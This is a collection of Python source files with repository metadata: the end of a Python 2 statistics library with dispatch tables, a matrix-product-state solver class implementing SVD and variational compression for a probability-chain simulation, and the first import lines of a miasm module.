dimension = 0
return asum(inarray*inarray,dimension,keepdims)
def asummult (array1,array2,dimension=None,keepdims=0):
"""
Multiplies elements in array1 and array2, element by element, and
returns the sum (along 'dimension') of all resulting multiplications.
Dimension can equal None (ravel array first), an integer (the
dimension over which to operate), or a sequence (operate over multiple
dimensions). A trivial function, but included for completeness.
Usage: asummult(array1,array2,dimension=None,keepdims=0)
"""
if dimension == None:
array1 = N.ravel(array1)
array2 = N.ravel(array2)
dimension = 0
return asum(array1*array2,dimension,keepdims)
def asquare_of_sums(inarray, dimension=None, keepdims=0):
"""
Adds the values in the passed array, squares that sum, and returns the
result. Dimension can equal None (ravel array first), an integer (the
dimension over which to operate), or a sequence (operate over multiple
dimensions). If keepdims=1, the returned array will have the same
NUMBER of dimensions as the original.
Usage: asquare_of_sums(inarray, dimension=None, keepdims=0)
Returns: the square of the sum over dim(s) in dimension
"""
if dimension == None:
inarray = N.ravel(inarray)
dimension = 0
s = asum(inarray,dimension,keepdims)
if type(s) == N.ArrayType:
return s.astype(N.Float)*s
else:
return float(s)*s
def asumdiffsquared(a,b, dimension=None, keepdims=0):
"""
Takes pairwise differences of the values in arrays a and b, squares
these differences, and returns the sum of these squares. Dimension
can equal None (ravel array first), an integer (the dimension over
which to operate), or a sequence (operate over multiple dimensions).
keepdims=1 means the return shape = len(a.shape) = len(b.shape)
Usage: asumdiffsquared(a,b)
Returns: sum[ravel(a-b)**2]
"""
if dimension == None:
inarray = N.ravel(a)
dimension = 0
return asum((a-b)**2,dimension,keepdims)
def ashellsort(inarray):
"""
Shellsort algorithm. Sorts a 1D-array.
Usage: ashellsort(inarray)
Returns: sorted-inarray, sorting-index-vector (for original array)
"""
n = len(inarray)
svec = inarray *1.0
ivec = range(n)
gap = n/2 # integer division needed
while gap >0:
for i in range(gap,n):
for j in range(i-gap,-1,-gap):
while j>=0 and svec[j]>svec[j+gap]:
temp = svec[j]
svec[j] = svec[j+gap]
svec[j+gap] = temp
itemp = ivec[j]
ivec[j] = ivec[j+gap]
ivec[j+gap] = itemp
gap = gap / 2 # integer division needed
# svec is now sorted input vector, ivec has the order svec[i] = vec[ivec[i]]
return svec, ivec
def arankdata(inarray):
"""
Ranks the data in inarray, dealing with ties appropritely. Assumes
a 1D inarray. Adapted from Gary Perlman's |Stat ranksort.
Usage: arankdata(inarray)
Returns: array of length equal to inarray, containing rank scores
"""
n = len(inarray)
svec, ivec = ashellsort(inarray)
sumranks = 0
dupcount = 0
newarray = N.zeros(n,N.Float)
for i in range(n):
sumranks = sumranks + i
dupcount = dupcount + 1
if i==n-1 or svec[i] <> svec[i+1]:
averank = sumranks / float(dupcount) + 1
for j in range(i-dupcount+1,i+1):
newarray[ivec[j]] = averank
sumranks = 0
dupcount = 0
return newarray
def afindwithin(data):
"""
Returns a binary vector, 1=within-subject factor, 0=between. Input
equals the entire data array (i.e., column 1=random factor, last
column = measured values.
Usage: afindwithin(data) data in |Stat format
"""
numfact = len(data[0])-2
withinvec = [0]*numfact
for col in range(1,numfact+1):
rows = pstat.linexand(data,col,pstat.unique(pstat.colex(data,1))[0]) # get 1 level of this factor
if len(pstat.unique(pstat.colex(rows,0))) < len(rows): # if fewer subjects than scores on this factor
withinvec[col-1] = 1
return withinvec
#########################################################
#########################################################
###### RE-DEFINE DISPATCHES TO INCLUDE ARRAYS #########
#########################################################
#########################################################
## CENTRAL TENDENCY:
geometricmean = Dispatch ( (lgeometricmean, (ListType, TupleType)),
(ageometricmean, (N.ArrayType,)) )
harmonicmean = Dispatch ( (lharmonicmean, (ListType, TupleType)),
(aharmonicmean, (N.ArrayType,)) )
mean = Dispatch ( (lmean, (ListType, TupleType)),
(amean, (N.ArrayType,)) )
median = Dispatch ( (lmedian, (ListType, TupleType)),
(amedian, (N.ArrayType,)) )
medianscore = Dispatch ( (lmedianscore, (ListType, TupleType)),
(amedianscore, (N.ArrayType,)) )
mode = Dispatch ( (lmode, (ListType, TupleType)),
(amode, (N.ArrayType,)) )
tmean = Dispatch ( (atmean, (N.ArrayType,)) )
tvar = Dispatch ( (atvar, (N.ArrayType,)) )
tstdev = Dispatch ( (atstdev, (N.ArrayType,)) )
tsem = Dispatch ( (atsem, (N.ArrayType,)) )
## VARIATION:
moment = Dispatch ( (lmoment, (ListType, TupleType)),
(amoment, (N.ArrayType,)) )
variation = Dispatch ( (lvariation, (ListType, TupleType)),
(avariation, (N.ArrayType,)) )
skew = Dispatch ( (lskew, (ListType, TupleType)),
(askew, (N.ArrayType,)) )
kurtosis = Dispatch ( (lkurtosis, (ListType, TupleType)),
(akurtosis, (N.ArrayType,)) )
describe = Dispatch ( (ldescribe, (ListType, TupleType)),
(adescribe, (N.ArrayType,)) )
## DISTRIBUTION TESTS
skewtest = Dispatch ( (askewtest, (ListType, TupleType)),
(askewtest, (N.ArrayType,)) )
kurtosistest = Dispatch ( (akurtosistest, (ListType, TupleType)),
(akurtosistest, (N.ArrayType,)) )
normaltest = Dispatch ( (anormaltest, (ListType, TupleType)),
(anormaltest, (N.ArrayType,)) )
## FREQUENCY STATS:
itemfreq = Dispatch ( (litemfreq, (ListType, TupleType)),
(aitemfreq, (N.ArrayType,)) )
scoreatpercentile = Dispatch ( (lscoreatpercentile, (ListType, TupleType)),
(ascoreatpercentile, (N.ArrayType,)) )
percentileofscore = Dispatch ( (lpercentileofscore, (ListType, TupleType)),
(apercentileofscore, (N.ArrayType,)) )
histogram = Dispatch ( (lhistogram, (ListType, TupleType)),
(ahistogram, (N.ArrayType,)) )
cumfreq = Dispatch ( (lcumfreq, (ListType, TupleType)),
(acumfreq, (N.ArrayType,)) )
relfreq = Dispatch ( (lrelfreq, (ListType, TupleType)),
(arelfreq, (N.ArrayType,)) )
## VARIABILITY:
obrientransform = Dispatch ( (lobrientransform, (ListType, TupleType)),
(aobrientransform, (N.ArrayType,)) )
samplevar = Dispatch ( (lsamplevar, (ListType, TupleType)),
(asamplevar, (N.ArrayType,)) )
samplestdev = Dispatch ( (lsamplestdev, (ListType, TupleType)),
(asamplestdev, (N.ArrayType,)) )
signaltonoise = Dispatch( (asignaltonoise, (N.ArrayType,)),)
var = Dispatch ( (lvar, (ListType, TupleType)),
(avar, (N.ArrayType,)) )
stdev = Dispatch ( (lstdev, (ListType, TupleType)),
(astdev, (N.ArrayType,)) )
sterr = Dispatch ( (lsterr, (ListType, TupleType)),
(asterr, (N.ArrayType,)) )
sem = Dispatch ( (lsem, (ListType, TupleType)),
(asem, (N.ArrayType,)) )
z = Dispatch ( (lz, (ListType, TupleType)),
(az, (N.ArrayType,)) )
zs = Dispatch ( (lzs, (ListType, TupleType)),
(azs, (N.ArrayType,)) )
## TRIMMING FCNS:
threshold = Dispatch( (athreshold, (N.ArrayType,)),)
trimboth = Dispatch ( (ltrimboth, (ListType, TupleType)),
(atrimboth, (N.ArrayType,)) )
trim1 = Dispatch ( (ltrim1, (ListType, TupleType)),
(atrim1, (N.ArrayType,)) )
## CORRELATION FCNS:
paired = Dispatch ( (lpaired, (ListType, TupleType)),
(apaired, (N.ArrayType,)) )
pearsonr = Dispatch ( (lpearsonr, (ListType, TupleType)),
(apearsonr, (N.ArrayType,)) )
spearmanr = Dispatch ( (lspearmanr, (ListType, TupleType)),
(aspearmanr, (N.ArrayType,)) )
pointbiserialr = Dispatch ( (lpointbiserialr, (ListType, TupleType)),
(apointbiserialr, (N.ArrayType,)) )
kendalltau = Dispatch ( (lkendalltau, (ListType, TupleType)),
(akendalltau, (N.ArrayType,)) )
linregress = Dispatch ( (llinregress, (ListType, TupleType)),
(alinregress, (N.ArrayType,)) )
## INFERENTIAL STATS:
ttest_1samp = Dispatch ( (lttest_1samp, (ListType, TupleType)),
(attest_1samp, (N.ArrayType,)) )
ttest_ind = Dispatch ( (lttest_ind, (ListType, TupleType)),
(attest_ind, (N.ArrayType,)) )
ttest_rel = Dispatch ( (lttest_rel, (ListType, TupleType)),
(attest_rel, (N.ArrayType,)) )
chisquare = Dispatch ( (lchisquare, (ListType, TupleType)),
(achisquare, (N.ArrayType,)) )
ks_2samp = Dispatch ( (lks_2samp, (ListType, TupleType)),
(aks_2samp, (N.ArrayType,)) )
mannwhitneyu = Dispatch ( (lmannwhitneyu, (ListType, TupleType)),
(amannwhitneyu, (N.ArrayType,)) )
tiecorrect = Dispatch ( (ltiecorrect, (ListType, TupleType)),
(atiecorrect, (N.ArrayType,)) )
ranksums = Dispatch ( (lranksums, (ListType, TupleType)),
(aranksums, (N.ArrayType,)) )
wilcoxont = Dispatch ( (lwilcoxont, (ListType, TupleType)),
(awilcoxont, (N.ArrayType,)) )
kruskalwallish = Dispatch ( (lkruskalwallish, (ListType, TupleType)),
(akruskalwallish, (N.ArrayType,)) )
friedmanchisquare = Dispatch ( (lfriedmanchisquare, (ListType, TupleType)),
(afriedmanchisquare, (N.ArrayType,)) )
## PROBABILITY CALCS:
chisqprob = Dispatch ( (lchisqprob, (IntType, FloatType)),
(achisqprob, (N.ArrayType,)) )
zprob = Dispatch ( (lzprob, (IntType, FloatType)),
(azprob, (N.ArrayType,)) )
ksprob = Dispatch ( (lksprob, (IntType, FloatType)),
(aksprob, (N.ArrayType,)) )
fprob = Dispatch ( (lfprob, (IntType, FloatType)),
(afprob, (N.ArrayType,)) )
betacf = Dispatch ( (lbetacf, (IntType, FloatType)),
(abetacf, (N.ArrayType,)) )
betai = Dispatch ( (lbetai, (IntType, FloatType)),
(abetai, (N.ArrayType,)) )
erfcc = Dispatch ( (lerfcc, (IntType, FloatType)),
(aerfcc, (N.ArrayType,)) )
gammln = Dispatch ( (lgammln, (IntType, FloatType)),
(agammln, (N.ArrayType,)) )
## ANOVA FUNCTIONS:
F_oneway = Dispatch ( (lF_oneway, (ListType, TupleType)),
(aF_oneway, (N.ArrayType,)) )
F_value = Dispatch ( (lF_value, (ListType, TupleType)),
(aF_value, (N.ArrayType,)) )
## SUPPORT FUNCTIONS:
incr = Dispatch ( (lincr, (ListType, TupleType, N.ArrayType)), )
sum = Dispatch ( (lsum, (ListType, TupleType)),
(asum, (N.ArrayType,)) )
cumsum = Dispatch ( (lcumsum, (ListType, TupleType)),
(acumsum, (N.ArrayType,)) )
ss = Dispatch ( (lss, (ListType, TupleType)),
(ass, (N.ArrayType,)) )
summult = Dispatch ( (lsummult, (ListType, TupleType)),
(asummult, (N.ArrayType,)) )
square_of_sums = Dispatch ( (lsquare_of_sums, (ListType, TupleType)),
(asquare_of_sums, (N.ArrayType,)) )
sumdiffsquared = Dispatch ( (lsumdiffsquared, (ListType, TupleType)),
(asumdiffsquared, (N.ArrayType,)) )
shellsort = Dispatch ( (lshellsort, (ListType, TupleType)),
(ashellsort, (N.ArrayType,)) )
rankdata = Dispatch ( (lrankdata, (ListType, TupleType)),
(arankdata, (N.ArrayType,)) )
findwithin = Dispatch ( (lfindwithin, (ListType, TupleType)),
(afindwithin, (N.ArrayType,)) )
###################### END OF NUMERIC FUNCTION BLOCK #####################
###################### END OF STATISTICAL FUNCTIONS ######################
except ImportError:
pass
|
dschwilk/traithull
|
stats/stats.py
|
Python
|
gpl-2.0
| 152,205
|
"""
Program name: MPS-Proba
Program purpose: The Alpha version of the APC 524 project.
File name: mpssolver.py
File purpose: the solver class based on the matrix product states
Responsible persons:
Peiqi Wang and Jun Xiong for Contraction and Compression
Bin Xu for Interpreter
"""
from solver import Solver
from copy import deepcopy
import numpy as np
import math
class MpsSolver(Solver):
"""
The MPS solver base class
"""
"""
Variables in the class
L: length of the chain
bound_dimension: dimension of the auxilary space for the compressed MPS
n: dimension of the physical space
mps: current state expressed in mps. It is the mps obtained after apply the mpo
mpsc: current compressed mps. It is obtained by calling compression algorithm
mpo: operator. By convention we always apply mpo on mpsc
partial_overlap_lr, partial_overlap_rl: the partial overlap between mps and mpsc. this is only useful in the algorithm of compression by variation
results: list of mps keeping the history
t: current time
epsil: error threshold for CompressionVariational.
cpr_err: error of the compression(L2 distance between compressed state and true state)
"""
"""CompressionSVDSweepToRight and CompressionSVDSweepToLeft are the two methods for SVD compression implemented by Jun Xiong. The result is stored in self.mpsc.
"""
##mps_element = ndarray(shape = (2, 10, 10), dtype = float) # this is just an example of the mps, the order of indices: physical, left_aux, right_aux
##mpo_element = ndarray(shape = (2, 2, 4, 4), dtype = float) # this is just an example of the mpo, the order of indices: physical_in, physical_out, left_aux, right_aux
def __init__(self, model, bound_dimension):
self.model = model
self.bound_dimension = bound_dimension
self.t=0
self.results = [] # list of mps_chain, result history
self.model.prepareMps()
self.model.prepareMpo()
self.interpreter()
def interpreter(self):
if self.model.model_type in self.boy_models:
self.mpo = self.model.mpo
self.mps = self.model.mps
#when initializing, put mpsc the same as mps so we can apply mpo on it
self.mpsc = deepcopy(self.model.mps)
self.results.append(self.mpsc)
self.L = len(self.model.mps)
self.n = np.shape(self.model.mps[0])[0]
self.partial_overlap_lr=[None]*self.L;
self.partial_overlap_rl=[None]*self.L;
self.cpr_err=0
self.epsil=0.00001
self.negative_norm_flag=0
else:
raise Exception("The model is not supported!")
"""def CompressionSVD(self):
The compression based on SVD, to be implemented by Jun Xiong
raise NotImplementedError("please implement")"""
def compression(self):
self.compressionSVD()
self.compressionVariational()
def evolve(self,nstep):
for i in range(nstep):
if (self.negative_norm_flag==0):
self.step()
else:
break
#Update the system state from t to t+1
def step(self):
print "Step:", self.t
self.t=self.t+1
self.contraction()
# self.compressionSVDSweepToRightTest()
# self.compressionSVDSweepToLeftTest()
self.compressionVariational(0,1,0)
self.results.append(self.mpsc)
def compressionSVDSweepToRight(self):
self.mpsc= []
self.mpsc.append(self.mps[0])
for i in range(0, self.L-1):
A=np.reshape(self.mpsc[-1],(self.mpsc[-1].shape[0]*self.mpsc[-1].shape[1],self.mpsc[-1].shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
s_dim= self.bound_dimension
U=U[:, 0:s_dim]
s1=np.diag(s)[0:s_dim, 0:s_dim]
V=V[0:s_dim, :]
self.mpsc[-1]=np.reshape(U,(self.mpsc[-1].shape[0],self.mpsc[-1].shape[1],U.shape[1]))
B=np.dot(s1,V)
self.mpsc.append( np.tensordot(self.mps[i+1],B,axes=([1],[1])) )
self.mpsc[-1]=np.swapaxes(self.mpsc[-1],1,2)
def compressionSVDSweepToLeft(self):
# First store mpsc in a reverse order
self.mpsc = []
self.mpsc.append(self.mps[self.L-1])
for i in range(self.L-1, 0, -1):
A=np.swapaxes(self.mpsc[-1],1,2)
A=np.reshape(A,(A.shape[0]*A.shape[1],A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
s_dim= self.bound_dimension
U=U[:, 0:s_dim]
s1=np.diag(s)[0:s_dim, 0:s_dim]
V=V[0:s_dim, :]
self.mpsc[-1]=np.reshape(U,(self.mpsc[-1].shape[0],self.mpsc[-1].shape[2],U.shape[1]))
self.mpsc[-1]=np.swapaxes(self.mpsc[-1],1,2)
B=np.dot(s1,V)
self.mpsc.append( np.tensordot(self.mps[i-1],B,axes=([2],[1])) )
self.mpsc.reverse()
#apply mpo on the current compressed mps (mpsc). store the result on variable mps
#convention for mpo: phys_in, phys_out, aux_l, aux_r
#convention for mps: phys, aux_l, aux_r
def contraction(self):
for i in range(0,self.L):
A=np.tensordot(self.mpo[i],self.mpsc[i],axes=([0],[0]))
A=np.swapaxes(A,2,3)
self.mps[i]=np.reshape(A,(A.shape[0], A.shape[1]*A.shape[2], A.shape[3]*A.shape[4]))
#overlap two mps, output <mps1,mps2>
def overlap(self,mps1,mps2):
result=np.tensordot(mps1[0],mps2[0],axes=([0],[0]))
result=result[0,:,0,:]
#result=np.swapaxes(result,1,2)
L=len(mps1)
if len(mps2)!=L:
raise Exception("Cannot overlap two mps with different lengths")
for i in range(L-1):
B=np.tensordot(mps1[i+1],mps2[i+1],axes=([0],[0]))
result=np.tensordot(result,B,axes=([0,1],[0,2]))
#result=np.tensordot(result,B,axes=([2,3],[0,2]))
return result
#left-normalize the MPS from the left end to MPS[l]
def leftNormalize(self,l):
for i in range(0,l-1):
A=np.reshape(self.mps[i],(self.mps[i].shape[0]*self.mps[i].shape[1],self.mps[i].shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mps[i]=np.reshape(U,(self.mps[i].shape[0],self.mps[i].shape[1],U.shape[1]))
B=np.dot(np.diag(s),V)
self.mps[i+1]=np.tensordot(self.mps[i+1],B,axes=([1],[1]))
self.mps[i+1]=np.swapaxes(self.mps[i+1],1,2)
#right-normalize the MPS from the right end to MPS[l]
def rightNormalize(self,l):
L=len(self.mps)
for i in range(L-l-1):
A=np.swapaxes(self.mps[L-1-i],1,2)
A=np.reshape(A,(A.shape[0]*A.shape[1],A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mps[L-1-i]=np.reshape(U,(self.mps[L-1-i].shape[0],self.mps[L-1-i].shape[2],U.shape[1]))
self.mps[L-1-i]=np.swapaxes(self.mps[L-1-i],1,2)
B=np.dot(np.diag(s),V)
self.mps[L-2-i]=np.tensordot(self.mps[L-2-i],B,axes=([2],[1]))
#obtain a mixed-canonical form centered on MPS[l]
def mixedCanonize(self,l):
self.leftNormalize(l);
self.rightNormalize(l);
'''
The following code implements the Compression by variation.
'''
#Form a random guess for mpsc,and right or left normalized it depending on the direction of first sweep.
#The result serves as the starting point for the iterations
def initializeMpscVar(self,direction):
self.mpsc=[];
#new_mps=np.zeros(shape=(n,1,d),dtype=float);
#new_mps=np.random.rand(self.n,1,self.bound_dimension);
new_mps=np.ones(shape=(self.n,1,self.bound_dimension),dtype=float)
self.mpsc.append(new_mps)
mpsc_module=np.tensordot(self.mpsc[0],self.mpsc[0],axes=([0],[0]))
mpsc_module=mpsc_module[0,:,0,:]
for i in range(1,self.L-1):
#new_mps=np.zeros(shape=(n,d,d),dtype=float);
#new_mps=np.random.rand(self.n,self.bound_dimension,self.bound_dimension);
new_mps=np.ones(shape=(self.n,self.bound_dimension,self.bound_dimension),dtype=float)
self.mpsc.append(new_mps)
B=np.tensordot(self.mpsc[i],self.mpsc[i],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[0,2]))
#new_mps=np.zeros(shape=(2,d,1),dtype=float)
#new_mps=np.random.rand(self.n,self.bound_dimension,1)
new_mps=np.ones(shape=(self.n,self.bound_dimension,1),dtype=float)
self.mpsc.append(new_mps)
B=np.tensordot(self.mpsc[self.L-1],self.mpsc[self.L-1],axes=([0],[0]))
self.cpr_err=np.tensordot(mpsc_module,B,axes=([0,1],[0,2]))
#right-normalizae the states if first sweep is from left to right
if (direction==0):
for i in range(self.L-1):
A=np.swapaxes(self.mpsc[self.L-1-i],1,2)
A=np.reshape(A,(A.shape[0]*A.shape[1],A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mpsc[self.L-1-i]=np.reshape(U,(self.mpsc[self.L-1-i].shape[0],self.mpsc[self.L-1-i].shape[2],U.shape[1]))
self.mpsc[self.L-1-i]=np.swapaxes(self.mpsc[self.L-1-i],1,2)
B=np.dot(np.diag(s),V)
self.mpsc[self.L-2-i]=np.tensordot(self.mpsc[self.L-2-i],B,axes=([2],[1]))
#left-normalizae the states if first sweep is from right to left
else:
for i in range(self.L-1):
A=np.reshape(self.mpsc[i],(self.mpsc[i].shape[0]*self.mpsc[i].shape[1],self.mpsc[i].shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mpsc[i]=np.reshape(U,(self.mpsc[i].shape[0],self.mpsc[i].shape[1],U.shape[1]))
B=np.dot(np.diag(s),V)
self.mpsc[i+1]=np.tensordot(self.mpsc[i+1],B,axes=([1],[1]))
self.mpsc[i+1]=np.swapaxes(self.mpsc[i+1],1,2)
#Initialize the list of partial overlap, depending on the direction of first compression sweep.
def initializePartialOvl(self,direction):
#If the first sweep is from left to right, we initialize the right to left partial overlap list.
if (direction==0):
self.partial_overlap_rl[self.L-1]=np.tensordot(self.mpsc[self.L-1],self.mps[self.L-1],axes=([0],[0]));
self.partial_overlap_rl[self.L-1]=self.partial_overlap_rl[self.L-1][:,0,:,0];
for i in range(self.L-1):
A=np.tensordot(self.mpsc[self.L-2-i],self.mps[self.L-2-i],axes=([0],[0]))
self.partial_overlap_rl[self.L-2-i]=np.tensordot(A,self.partial_overlap_rl[self.L-1-i],axes=([1,3],[0,1]))
self.cpr_err=self.cpr_err-2*self.partial_overlap_rl[0]
#If the first sweep is from right to left, we initialize the left to right partial overlap list.
elif (direction==1):
self.partial_overlap_lr[0]=np.tensordot(self.mpsc[0],self.mps[0],axes=([0],[0]));
self.partial_overlap_lr[0]=self.partial_overlap_lr[0][0,:,0,:];
for i in range(self.L-1):
A=np.tensordot(self.mpsc[i+1],self.mps[i+1],axes=([0],[0]))
self.partial_overlap_lr[i+1]=np.tensordot(A,self.partial_overlap_lr[i],axes=([0,2],[0,1]))
self.cpr_err=self.cpr_err-2*self.partial_overlap_lr[self.L-1]
#Perform a single sweep from left to right
#Normalize the mpsc after each sweep if input norm=1
def compressionSweepLeftRight(self,norm):
A=np.tensordot(self.mps[0],self.partial_overlap_rl[1],axes=([2],[1]))
#perform left normalization
A=np.reshape(A,(A.shape[0],A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mpsc[0]=np.reshape(U,(A.shape[0],1,U.shape[1]))
##Update partialoverlap list (direction left to right)
self.partial_overlap_lr[0]=np.tensordot(self.mpsc[0],self.mps[0],axes=([0],[0]))
self.partial_overlap_lr[0]=self.partial_overlap_lr[0][0,:,0,:]
mpsc_module=np.tensordot(self.mpsc[0],self.mpsc[0],axes=([0],[0]))
mpsc_module=mpsc_module[0,:,0,:]
self.l1_norm=np.sum(self.mpsc[0],axis=0)
for i in range(self.L-2):
A=np.tensordot(self.mps[i+1],self.partial_overlap_rl[i+2],axes=([2],[1]))
A=np.tensordot(self.partial_overlap_lr[i],A,axes=([1],[1]))
A=np.swapaxes(A,0,1)
#perform left normalization
mA=A.shape[0]
nA=A.shape[1]
A=np.reshape(A,(mA*nA,A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
self.mpsc[i+1]=np.reshape(U,(mA,nA,U.shape[1]))
##Update partialoverlap list (direction left to right)
A=np.tensordot(self.mpsc[i+1],self.mps[i+1],axes=([0],[0]))
self.partial_overlap_lr[i+1]=np.tensordot(self.partial_overlap_lr[i],A,axes=([0,1],[0,2]))
B=np.tensordot(self.mpsc[i+1],self.mpsc[i+1],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[0,2]))
C=np.sum(self.mpsc[i+1],axis=0)
self.l1_norm=np.dot(self.l1_norm,C)
A=np.tensordot(self.partial_overlap_lr[self.L-2],self.mps[self.L-1],axes=([1],[1]))
self.mpsc[self.L-1]=np.swapaxes(A,0,1)
#no need to left-normalize the right-most MPS, we update partialoverlap list
#this gives us <mpsc,mps> at the end of the iteration
A=np.tensordot(self.mpsc[self.L-1],self.mps[self.L-1],axes=([0],[0]))
self.partial_overlap_lr[self.L-1]=np.tensordot(self.partial_overlap_lr[self.L-2],A,axes=([0,1],[0,2]))
B=np.tensordot(self.mpsc[self.L-1],self.mpsc[self.L-1],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[0,2]))
self.cpr_err=mpsc_module-2*self.partial_overlap_lr[self.L-1]
C=np.sum(self.mpsc[self.L-1],axis=0)
self.l1_norm=np.dot(self.l1_norm,C)
self.l1_norm=float(self.l1_norm)
#normalize the states if required by the user
if (norm==1):
try:
Ka=self.l1_norm**(1.0/self.L)
self.mpsc=[(self.mpsc[n])/Ka for n in range(self.L)]
self.cpr_err=mpsc_module/(self.l1_norm*self.l1_norm)-2*self.partial_overlap_lr[self.L-1]/self.l1_norm
self.partial_overlap_lr=[(self.partial_overlap_lr[n])/(Ka**(n+1)) for n in range(self.L)]
self.negative_norm_flag=0
except ValueError:
print "Warning: Negative norm ("+str(self.l1_norm)+") obtained at t="+str(self.t+1)+", maybe stuck in a local minimum."
print "Try to increase epsilon or decrease the number of sweeps and call compressionVariational() again."
self.negative_norm_flag=1
#Perform a single sweep from right to left
#Normalize the mpsc after each sweep if input norm=1
def compressionSweepRightLeft(self,norm):
A=np.tensordot(self.mps[self.L-1],self.partial_overlap_lr[self.L-2],axes=([1],[1]))
#perform right normalization
mA=A.shape[0]
nA=A.shape[1]
A=np.reshape(A,(mA*nA,A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
U=np.reshape(U,(mA,nA,U.shape[1]))
self.mpsc[self.L-1]=np.swapaxes(U,1,2)
##Update partialoverlap list (direction right to left)
self.partial_overlap_rl[self.L-1]=np.tensordot(self.mpsc[self.L-1],self.mps[self.L-1],axes=([0],[0]))
self.partial_overlap_rl[self.L-1]=self.partial_overlap_rl[self.L-1][:,0,:,0]
mpsc_module=np.tensordot(self.mpsc[self.L-1],self.mpsc[self.L-1],axes=([0],[0]))
mpsc_module=mpsc_module[:,0,:,0]
self.l1_norm=np.sum(self.mpsc[self.L-1],axis=0)
for i in range(self.L-2):
A=np.tensordot(self.mps[self.L-2-i],self.partial_overlap_rl[self.L-1-i],axes=([2],[1]))
A=np.tensordot(A,self.partial_overlap_lr[self.L-3-i],axes=([1],[1]))
#perform right normalization
mA=A.shape[0]
nA=A.shape[1]
A=np.reshape(A,(mA*nA,A.shape[2]))
U, s, V=np.linalg.svd(A, full_matrices=False)
U=np.reshape(U,(mA,nA,U.shape[1]))
self.mpsc[self.L-i-2]=np.swapaxes(U,1,2)
##Update partialoverlap list (direction right to left)
A=np.tensordot(self.mpsc[self.L-i-2],self.mps[self.L-i-2],axes=([0],[0]))
self.partial_overlap_rl[self.L-i-2]=np.tensordot(self.partial_overlap_rl[self.L-i-1],A,axes=([0,1],[1,3]))
B=np.tensordot(self.mpsc[self.L-i-2],self.mpsc[self.L-i-2],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[1,3]))
C=np.sum(self.mpsc[self.L-i-2],axis=0)
self.l1_norm=np.dot(C,self.l1_norm)
self.mpsc[0]=np.tensordot(self.mps[0],self.partial_overlap_rl[1],axes=([2],[1]))
#no need to left-normalize the right-most MPS, we update partialoverlap list
#this gives us <mpsc,mps> at the end of the iteration
A=np.tensordot(self.mpsc[0],self.mps[0],axes=([0],[0]))
self.partial_overlap_rl[0]=np.tensordot(self.partial_overlap_rl[1],A,axes=([0,1],[1,3]))
B=np.tensordot(self.mpsc[0],self.mpsc[0],axes=([0],[0]))
mpsc_module=np.tensordot(mpsc_module,B,axes=([0,1],[1,3]))
self.cpr_err=mpsc_module-2*self.partial_overlap_rl[0]
C=np.sum(self.mpsc[0],axis=0)
self.l1_norm=np.dot(C,self.l1_norm)
self.l1_norm=float(self.l1_norm)
#normalize the states if required by the user
if (norm==1):
try:
Ka=self.l1_norm**(1.0/self.L)
self.mpsc=[(self.mpsc[n])/Ka for n in range(self.L)]
self.cpr_err=mpsc_module/(self.l1_norm**2)-2*self.partial_overlap_rl[0]/self.l1_norm
self.partial_overlap_rl=[(self.partial_overlap_rl[n])/(Ka**(self.L-n)) for n in range(self.L)]
self.negative_norm_flag=0
except ValueError:
print "Warning: Negative norm ("+str(self.l1_norm)+") obtained at t="+str(self.t+1)+", maybe stuck in a local minimum."
print "Try to increase epsilon or decrease the number of sweeps and call compressionVariational() again."
self.negative_norm_flag=1
#main routine for compression by variation. Options:
#direction: choose the direction for first sweep, 0 for left to right and 1 for right to left.
#sweep_nbr: choose the number of sweeps. If sweep_nbr=0 then sweep until converge.
#norm: choose whether to normalize the states after each sweep.
#If norm=0, then the normalization will take place after all sweeps
#If norm=1, then the mpsc is normalized after each sweep.
def compressionVariational(self,direction=0,sweep_nbr=0,norm=0):
"""
The compression based on the variational principle, to be implemented by Peiqi Wang
"""
##form a initial guess
#self.compressionSVDSweepToLeft()
self.initializeMpscVar(direction)
##Initialize Partial Overlap lists
self.initializePartialOvl(direction)
##Calculate the L2 norm of the MPS to be compressed
error=10000
##Direction of previous sweep. 0 means left to right and 1 means right to left
last_direction=1-direction
if (sweep_nbr==0):
sweep=0
#sweep until converge
while (error>self.epsil):
if (last_direction==1):
last_cpr_err=self.cpr_err
self.compressionSweepLeftRight(norm)
# print(self.l1_norm) # show the L1 norm of mpsc
error=abs(last_cpr_err-self.cpr_err)
last_direction = 0
sweep=sweep+1
elif (last_direction==0):
last_cpr_err=self.cpr_err
self.compressionSweepRightLeft(norm)
# print(self.l1_norm) # show the L1 norm of mpsc
error=abs(last_cpr_err-self.cpr_err)
last_direction = 1
sweep=sweep+1
#number of sweeps performs
# print(sweep)
if (norm==0):
self.normalizeProba()
else:
#sweep exactly as many as user requires
for sweep in range(sweep_nbr):
if (last_direction==1):
last_cpr_err=self.cpr_err
self.compressionSweepLeftRight(norm)
# print(self.l1_norm) # show the L1 norm of mpsc
error=abs(last_cpr_err-self.cpr_err)
last_direction = 0
elif (last_direction==0):
last_cpr_err=self.cpr_err
self.compressionSweepRightLeft(norm)
# print(self.l1_norm) # show the L1 norm of mpsc
error=abs(last_cpr_err-self.cpr_err)
last_direction = 1
if (norm==0):
self.normalizeProba()
def normalizeProba(self):
try:
Ka=self.l1_norm**(1.0/self.L)
self.mpsc=[(self.mpsc[n])/Ka for n in range(self.L)]
self.negative_norm_flag=0
except ValueError:
print "Warning: Negative norm ("+str(self.l1_norm)+") obtained at t="+str(self.t+1)+", maybe stuck in a local minimum."
print "Try to increase epsilon or decrease the number of sweeps and call compressionVariational() again."
self.negative_norm_flag=1
|
binarybin/MPS_Proba
|
src/mpssolver.py
|
Python
|
gpl-2.0
| 21,994
|
from builtins import range
from future.utils import viewitems, viewvalues
from miasm.expression.expression import *
from miasm.ir.ir import IntermediateRepresentation, IRBlock, AssignBlock
